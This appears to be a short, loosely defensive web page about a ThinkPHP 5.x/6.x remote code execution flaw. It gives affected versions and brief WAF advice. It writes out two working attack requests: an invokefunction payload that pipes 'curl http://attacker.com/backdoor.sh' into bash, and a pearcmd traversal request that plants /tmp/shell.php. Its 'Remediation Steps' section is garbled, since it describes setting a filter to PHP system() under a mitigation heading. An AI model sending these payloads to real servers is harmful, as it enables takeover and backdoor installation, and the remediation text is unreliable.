Thinkphp V5.1.41 Exploit [verified]

Use regex to block:

GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=FFI::cdef("int system(const char *cmd);")->system("curl http://attacker.com/backdoor.sh | bash")

Use a WAF with specific rulesets for ThinkPHP to catch _method injection attempts and common RCE keywords.

If you are running in production right now, stop reading and patch immediately. The exploit is trivial, the payloads are weaponized, and the attackers are already scanning your IP.

GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/shell.php

Affected Versions

ThinkPHP 5.1.x: v5.1.0 to v5.1.41.
ThinkPHP 6.0.x: v6.0.0 to v6.0.13.
ThinkPHP 5.0.x: v5.0.0 to v5.0.24.

Remediation Steps

Immediate Mitigation:

This sets the framework's internal data processing filter to the PHP system() function.
